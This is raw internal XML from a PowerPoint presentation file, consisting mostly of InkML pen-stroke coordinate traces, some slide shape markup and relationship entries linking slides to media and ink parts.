0,-8 1 0,0-1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,10-6 0,-5 2 0,1 0 0,-1 1 0,1 0 0,0 1 0,0 1 0,0 0 0,14 0 0,-21 1 0,2 0 0,1-1 0,-1 0 0,1-1 0,-1 0 0,0 0 0,0-1 0,-1 0 0,1 0 0,8-8 0,-6 6 0,1-1 0,-1 1 0,23-8 0,35-7 0,-23 8 0,84-37 0,-97 36 0,69-19 0,-6 2 0,39-7 0,-98 26 0,1 2 0,63-8 0,3-2 0,-21 4 0,-42 8 0,67-20 0,45-16 0,-90 20 0,-35 12 0,0 2 0,47-11 0,-11 2 0,-52 15 0,0 0 0,0 1 0,1 0 0,0 0 0,21-1 0,36 4 0,-27 1 0,0-2 0,0-2 0,54-11 0,-60 7 0,0 1 0,0 2 0,63 1 0,-87 2 0,0 0 0,0-1 0,0 0 0,0-1 0,18-7 0,-17 5 0,0 1 0,1 1 0,-1 0 0,15-1 0,291 2 0,-155 5 0,482-3-732,-618 1 732,41 7 0,19 2 0,13-10-1243,-85 0-4973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0.814"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">193 0 24575,'-1'13'0,"1"0"0,1 0 0,0 0 0,1-1 0,0 1 0,1 0 0,1-1 0,0 0 0,0 0 0,1 0 0,1 0 0,0-1 0,0 0 0,10 12 0,35 44 0,-33-44 0,-1 0 0,17 34 0,-9-16 0,-16-27 0,0 1 0,-1 0 0,0 0 0,6 22 0,-13-33 0,0-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,0-1 0,1 1 0,-1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 0 0,0 0 0,0 1 0,0-1 0,0-1 0,-1 1 0,1 0 0,-4 2 0,-18 13 0,-31 19 0,32-23 0,-1 0 0,-1-2 0,0-1 0,-43 13 0,-25 11 0,83-30-36,1 1-1,0 0 0,1 0 0,-1 1 1,1 0-1,-7 8 0,0-1-1071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3.312"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 61 24575,'6'-1'0,"0"0"0,1 0 0,-1-1 0,0 0 0,0 0 0,0 0 0,10-7 0,18-5 0,-17 9 0,1-1 0,0 1 0,36-6 0,-52 11 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 1 0,1-1 0,-2 0 0,1 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 3 0,1 10 0,0 0 0,-1 0 0,0 29 0,-2-36 0,2 52 0,0-37 0,0-1 0,-2 1 0,0-1 0,-2 0 0,-6 26 0,3-30 0,-2 0 0,-9 17 0,-10 24 0,2-6 0,17-38 0,1 0 0,-6 18 0,12-32 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,2 1 0,4 1 0,1-1 0,0 1 0,0-1 0,11-1 0,4 2 0,11 4-455,1-1 0,56 0 0,-73-5-6371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5.093"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">482 0 24575,'-7'1'0,"1"-1"0,0 1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,0 1 0,1-1 0,-9 6 0,-4 4 0,-29 25 0,-8 6 0,41-33 0,0 0 0,1 2 0,0 0 0,1 0 0,0 1 0,1 0 0,-15 25 0,18-23 0,1-1 0,-9 27 0,-12 25 0,18-49 0,1 0 0,0 1 0,2 0 0,0 0 0,1 1 0,0 0 0,2 0 0,-4 31 0,-2 23 0,5-53 0,-1 39 0,5-35 0,-1 0 0,-8 46 0,5-41 0,1 1 0,2 0 0,1 0 0,5 58 0,-4-82 0,1 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,1 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,7 7 0,-2-4 0,1-1 0,0 0 0,0 0 0,1-1 0,18 9 0,18 14 0,-37-22 0,0-1 0,0 0 0,0-1 0,20 9 0,-11-9 0,-1-1 0,1-1 0,0 0 0,0-2 0,29 0 0,11 1 0,-43 1 0,0-1 0,-1 2 0,1 0 0,-1 1 0,21 10 0,-22-9 0,0-1 0,0 0 0,0-1 0,1 0 0,0-1 0,16 1 0,-14-4 0,0-2 0,0 0 0,0 0 0,-1-2 0,1 0 0,0 0 0,-1-2 0,0 0 0,19-11 0,-23 12 0,1 0 0,-1-1 0,0-1 0,0 0 0,-1 0 0,0-1 0,0 0 0,-1-1 0,0 0 0,8-11 0,2-6 0,-15 21 0,0 0 0,0 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,3-9 0,1-3 0,2-1 0,0 2 0,0-1 0,2 1 0,0 0 0,12-14 0,20-33 0,-11 17 0,-25 38 0,0 0 0,-1 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,-1 0 0,1-1 0,-2 1 0,1-1 0,-1 0 0,1-11 0,-3-1 0,1 1 0,1-1 0,1 1 0,1-1 0,1 1 0,13-34 0,-10 29 0,-1 0 0,0 0 0,-2-1 0,-1 0 0,-2 0 0,0 0 0,-2-1 0,-6-52 0,5 76 0,0 0 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-6-2 0,-1-1 0,-1 0 0,0 1 0,0 0 0,-1 1 0,-12-2 0,2 0 0,0-1 0,1-2 0,-31-14 0,-3 0 0,-4 2 0,0 2 0,-65-9 0,82 18 0,21 4 0,-1 1 0,1 1 0,-24 0 0,44 3-21,-11 0-248,1 0 0,-1-1 0,1 0 1,-21-5-1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8.393"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">15209 2042 24575,'-1'-1'0,"1"0"0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,0-1 0,-1 1 0,0 0 0,-34-4 0,32 4 0,-349-3 0,181 6 0,147-5 0,-48-8 0,47 6 0,-45-3 0,-65-4 0,-10 0 0,122 11 0,-22 1 0,0-2 0,-77-12 0,94 9 0,0 2 0,-54 1 0,-14-1 0,37-8 0,44 6 0,0 1 0,-23-1 0,-62-7 0,68 6 0,-49-1 0,-766 7 0,823-2 0,-48-9 0,47 5 0,-45-2 0,49 7 0,0-1 0,0-1 0,-29-7 0,25 5 0,-1 1 0,1 1 0,-1 1 0,-28 3 0,-58-3 0,55-10 0,42 8 0,1-1 0,-26 0 0,-46 4 0,50 1 0,0-1 0,-61-9 0,57 3 0,1 3 0,-49 1 0,-26-1 0,7-18 0,70 15 0,-2-1 0,-77-2 0,-1511 10 0,1611-1 0,1 2 0,-29 7 0,27-6 0,0 1 0,-20 0 0,-27-4 0,25 0 0,0 2 0,-54 8 0,-67 12 0,138-18 0,0-1 0,-1-1 0,-42-3 0,-27 2 0,34 10 0,43-8 0,1 1 0,-26 0 0,6-2 0,-1 2 0,1 2 0,-63 17 0,12-8 0,67-13 0,1 1 0,1 0 0,-1 1 0,0 1 0,-23 10 0,-9 7 0,-64 19 0,16-7 0,36-11 0,0-4 0,-86 16 0,81-25 0,-83 15 0,116-19 0,-44 4 0,-6 0 0,-198 37 0,233-38 0,-70 23 0,28-6 0,45-14 0,12-3 0,-1 0 0,0-3 0,-55 4 0,74-8 0,1-1 0,-23 7 0,-24 2 0,-9 1 0,53-7 0,-1 0 0,-24 0 0,-127 9 0,52-3 0,19-1-57,-60 3-1025,135-11 1049,-44 8 0,-11 1 46,-452-7 879,272-6-592,222 3-300,1-1 0,-57-11 0,-71-10 0,59 13 0,65 7 0,-41-8 0,48 4 0,-11-3 0,1 2 0,-76-3 0,92 8 0,-1 0 0,1-3 0,-49-13 0,16 4 0,48 10 0,1 0 0,0 0 0,1-1 0,-1-1 0,1 1 0,0-2 0,0 0 0,1 0 0,-11-11 0,6 7 0,0 0 0,0 1 0,-17-9 0,-26-5 0,46 20 0,-1 0 0,1 0 0,1-1 0,-1-1 0,1 0 0,0 0 0,0-1 0,-15-13 0,3-1 0,0 1 0,-1 2 0,-1 0 0,-1 2 0,-29-15 0,43 24 0,0-1 0,1-1 0,0 0 0,0 0 0,-8-11 0,8 9 0,0 0 0,-1 1 0,-23-17 0,30 23 0,0 1 0,0-1 0,1 0 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,1 0 0,-2-10 0,1 8 0,0-1 0,0 1 0,-1 0 0,1 0 0,-10-13 0,-75-88 0,58 69 0,24 31 0,1 1 0,-1-1 0,-1 1 0,1 0 0,-11-8 0,10 9 0,1-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,2-1 0,-1 1 0,-4-12 0,-18-27 0,21 38 0,1-1 0,1 0 0,-1-1 0,1 1 0,1-1 0,0 0 0,0 0 0,-2-19 0,-4-15 0,6 36 0,0 0 0,0 0 0,-1 1 0,0-1 0,-1 1 0,-6-8 0,5 7 0,1-1 0,-1 0 0,-7-18 0,-30-79 0,-13-11 0,49 104 0,0 0 0,-1 1 0,-16-19 0,-2-5 0,4 0 0,2 0 0,-18-48 0,28 64 0,-1 0 0,-26-33 0,27 42 0,0 0 0,0 2 0,-1-1 0,-14-9 0,-7-6 0,-88-95 0,22 22 0,87 89 0,-1 1 0,0 0 0,0 1 0,-1 0 0,1 1 0,-2 1 0,-16-5 0,9 2 0,1 0 0,-20-11 0,-28-23 0,34 20 0,0 2 0,-47-20 0,63 33 0,0 1 0,0 1 0,-1 0 0,-18-2 0,-67-12 0,70 11 0,-1 2 0,0 1 0,-38 0 0,-509 6 0,559 1 0,0 0 0,0 2 0,1 0 0,-1 2 0,-39 15 0,7-3 0,30-12 0,21-6 0,0 1 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,-4 4 0,6-4-1365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9.807"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">343 0 24575,'-3'2'0,"1"0"0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-3 4 0,-4 5 0,-87 88 0,59-65 0,-13 23 0,31-35 0,-28 49 0,15-23 0,27-43 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 1 0,0-1 0,0 1 0,-2 11 0,4-14 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,6 5 0,5 7 0,1-1 0,27 21 0,-35-30 0,1 0 0,0-1 0,0 0 0,1 0 0,-1-1 0,1 0 0,0 0 0,13 1 0,-15-3-80,0 0 0,0 0-1,0 1 1,0 0 0,0 0-1,0 1 1,0 0 0,-1 0-1,0 1 1,1-1 0,-1 1 0,0 1-1,-1-1 1,1 1 0,-1 0-1,8 9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3.487"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 19 24575,'45'-16'0,"-43"15"0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 3 0,1 9 0,0 1 0,-1 0 0,-1 0 0,-3 25 0,2-12 0,1 34 0,2-44 0,-2-1 0,0 0 0,-1 0 0,0 1 0,-2-1 0,0 0 0,0 0 0,-10 23 0,35-50 0,-9 4 0,-1-1 0,1 2 0,0-1 0,22-4 0,7 6 0,0 3 0,69 6 0,-109-5 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,0 2 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,0 5 0,-1 2 0,0 0 0,-1 0 0,0 0 0,-1-1 0,0 1 0,-1-1 0,-7 15 0,-21 29 0,21-37 0,0 0 0,2 0 0,-14 32 0,22-44-114,-1-1 1,0 0-1,0 0 0,-1 0 0,0-1 1,1 1-1,-1 0 0,0-1 0,0 0 1,-1 0-1,-5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6.386"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">501 1 24575,'-3'0'0,"-14"0"0,0 0 0,0 0 0,0 2 0,1 0 0,-1 1 0,0 0 0,-19 8 0,3 2 0,14-7 0,1 1 0,0 1 0,0 1 0,1 0 0,0 1 0,1 1 0,-25 21 0,34-25 0,-1 1 0,1 0 0,0 1 0,1-1 0,-1 1 0,2 1 0,0-1 0,0 1 0,0 0 0,1 0 0,1 0 0,0 1 0,0-1 0,1 1 0,0 0 0,0 17 0,-12 80 0,7-64 0,-3 5 0,6-31 0,1-1 0,-2 30 0,4-28 0,-9 37 0,6-36 0,-2 37 0,5-31 0,3 165 0,-1-183 0,1 0 0,0 0 0,0-1 0,1 1 0,0-1 0,6 11 0,10 28 0,-15-34 0,1 1 0,0-1 0,1 0 0,0 0 0,1-1 0,9 13 0,56 63 0,-38-47 0,-26-33 0,0 1 0,1-1 0,-1-1 0,1 0 0,0 0 0,1-1 0,0 0 0,17 7 0,21 10 0,-25-10 0,23 15 0,-41-23 0,1-1 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,9 0 0,4 0 0,0-1 0,21-3 0,-34 2 0,-1 0 0,1-1 0,0 0 0,0 0 0,-1-1 0,0 1 0,1-1 0,-1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,5-6 0,27-20 0,-23 18 0,0 0 0,-1-1 0,0 0 0,-1-1 0,-1 0 0,0-1 0,16-30 0,-13 21 0,-4 10 0,-1 0 0,-1-1 0,-1 0 0,0 0 0,-1-1 0,7-28 0,-6 11 0,-1 0 0,-1 0 0,-1-43 0,-3 28 0,1 28 0,-2 0 0,0 0 0,-2 0 0,-4-22 0,3 32 0,-1 0 0,0 0 0,-1 1 0,0 0 0,-12-17 0,10 16 0,1 0 0,0 0 0,0-1 0,-5-16 0,-6-23 0,-17-67 0,32 110 0,-1-8 0,-1 0 0,-9-25 0,12 36 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,-6-3 0,-3 0-136,1 0-1,1-1 1,-1 0-1,1-1 1,0 0-1,0-1 1,1 0-1,0 0 0,-11-14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8.901"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 4 24575,'0'-3'0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9.364"/>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8:00.165"/>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8.891"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">196 1 24575,'1'8'0,"1"1"0,0-1 0,1 1 0,0-1 0,0 0 0,0 0 0,1 0 0,1-1 0,-1 1 0,1-1 0,0 0 0,13 13 0,-9-8 0,-1 1 0,-1 0 0,1 1 0,9 28 0,-3-9 0,-12-29 0,0 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,-1 1 0,0 0 0,-3 4 0,-4 4 0,-1 0 0,0-1 0,-1 0 0,-21 16 0,2-1 0,8-7 0,-15 16 0,0 9 0,22-27 0,1 0 0,0 1 0,-15 27 0,26-39-227,0 0-1,-1-1 1,0 1-1,0-1 1,-10 9-1,5-6-6598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0.713"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 8263 24575,'2258'0'-592,"-2227"-1"592,41-7 0,-42 3 0,44 0 0,-53 4 305,41-7 0,6-1-323,1-1 18,-49 6 0,37-2 0,-6 3 0,63-13 0,-66 8 0,81-3 0,-61 7-439,79-14-1,-140 17 489,342-40-49,-167 27-1434,-117 12 1493,71-12 0,244-38-59,-95 15-1888,5 9 1455,-15 2-141,-134 12-76,58-8 707,-87 2-57,109-13 0,396-44 1892,-522 61-1892,120-17 0,-136 22 0,-32 4 0,59-1 0,-54 5 172,-1-1 0,93-22-1,100-41 658,-105 26-628,159-40-89,-216 52-95,-65 22 21,0 0 1,0 2-1,1 0 1,35-5-1,-21 5-28,0 0-1,0-2 1,52-18-1,68-17-24,-44 14 181,106-30-1514,129-40 1155,-212 63-301,-84 24 495,86-32 0,23-12-173,-13 4-967,10-9 1112,-27 12 281,143-76 0,-192 80-215,113-56-42,-141 80 3,-30 14 0,0-2 0,28-16 0,48-34 0,222-129 0,-36 22 1591,-216 117-962,-46 33-532,2 0-1,0 1 1,42-21 0,-38 24-97,-1-1 0,0 0 0,-1-2 0,40-31 0,8-13-341,138-84 0,-15 12 341,-115 74 0,86-45 0,-128 79-92,-1-1 0,43-36-1,-53 38-223,104-72 316,-39 27 0,-49 38 0,58-52 0,-60 42 43,79-79 638,-72 66-72,38-49 562,-17 20-698,-28 34-268,-34 39-205,197-223 0,-65 100 0,-16 24 0,-63 56 0,118-87 0,-103 80 0,24-21 0,-70 56 0,0 1 0,2 1 0,1 2 0,0 0 0,36-13 0,-18 8 0,-32 13 0,0 0 0,30-25 0,6-5 0,-25 20 0,0-1 0,36-38 0,-61 56 0,76-58 0,-38 21 0,1 1 0,74-51 0,5-9 0,-36 27 0,-41 39 0,-27 23 0,-1-2 0,0-1 0,-1 0 0,-1 0 0,0-2 0,16-20 0,-23 27 0,0 0 0,0 1 0,0-1 0,1 2 0,0-1 0,1 1 0,-1 1 0,1-1 0,11-4 0,32-23 0,94-95 0,-68 57 0,-63 59 0,1 0 0,33-17 0,-33 20 0,0-1 0,0 0 0,23-20 0,131-140 0,-161 162 0,1 0 0,1 1 0,-1 0 0,22-10 0,23-14 0,5-17 0,-37 28 0,48-31 0,-56 42 0,106-68 0,-38 21 0,-48 34 0,49-41 0,-54 37 0,-15 14 0,-2 0 0,0 0 0,18-21 0,-23 21 0,0 2 0,0-1 0,0 1 0,1 0 0,0 1 0,0 0 0,16-10 0,-17 13 0,0 0 0,0-1 0,-1 0 0,0 0 0,8-11 0,-8 9 0,0 1 0,1 0 0,-1 1 0,17-12 0,-2 2 0,0 0 0,-2-1 0,26-28 0,-29 27 0,1 1 0,1 1 0,0 1 0,29-18 0,-37 27 0,0 0 0,0-1 0,0 0 0,-1-1 0,0 0 0,-1-1 0,14-17 0,59-61 0,-69 72 0,0 1 0,1 1 0,1 0 0,0 1 0,1 0 0,0 1 0,27-14 0,-21 11 0,-1 0 0,-1-1 0,-1-1 0,0 0 0,-1-2 0,-1 0 0,27-40 0,-37 51 0,1-1 0,0 1 0,0 1 0,0 0 0,19-12 0,-17 12 0,-1 1 0,1-2 0,-1 1 0,-1-2 0,10-9 0,36-51 0,30-42 0,-70 93 0,1 1 0,1 1 0,0 0 0,1 1 0,21-14 0,-12 10 0,34-36 0,-53 47 0,0 0 0,-1-1 0,0 0 0,-1 0 0,0 0 0,5-14 0,5-7 0,-12 23 0,-1 1 0,1 0 0,0 1 0,0-1 0,0 1 0,1-1 0,0 1 0,0 1 0,0-1 0,0 0 0,1 1 0,9-7 0,-7 6 0,0 0 0,-1 0 0,0 0 0,0 0 0,-1-1 0,1 0 0,-1 0 0,8-14 0,-8 13 0,0-1 0,1 1 0,0-1 0,0 2 0,1-1 0,9-6 0,53-45 106,-49 40-841,37-27-1,-47 39-6090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2.586"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 39 24575,'27'0'0,"0"0"0,1 0 0,0-2 0,43-8 0,-47 4 0,-4 1 0,1 0 0,0 1 0,0 1 0,35 0 0,-54 3 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 3 0,0 10 0,0 0 0,-1-1 0,-3 23 0,1-12 0,1 71-1365,1-79-5461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6.839"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 4 24575,'3'0'0,"1"-3"0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8.35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02:34.505"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'0'3'0,"4"2"0,4-1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11/23/2022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97145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8884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55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03594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236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21597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547267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519312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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390059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107876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6785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0817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20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02801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22972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8177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95774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07431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3717A-E3C1-4BED-ABE0-B7069385E023}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/23/2022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8" name="Picture 7" descr="Shape&#10;&#10;Description automatically generated with low confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F71804F-5703-D2FE-0A23-734EC7153D0E}"/>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72418" y="6082817"/>
            <a:ext cx="681102" cy="681037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19689706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0.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.tif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink16.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customXml" Target="../ink/ink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8.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout18.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01.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink25.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image341.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image270.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink22.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image321.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.tif"/><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6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink19.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image291.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image311.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink21.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image331.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image280.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink23.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide26.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30.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42.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image370.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image300.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink31.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image350.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image390.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.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320.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink37.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image290.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image340.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image380.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60.png"/><Relationship Id="rId4" 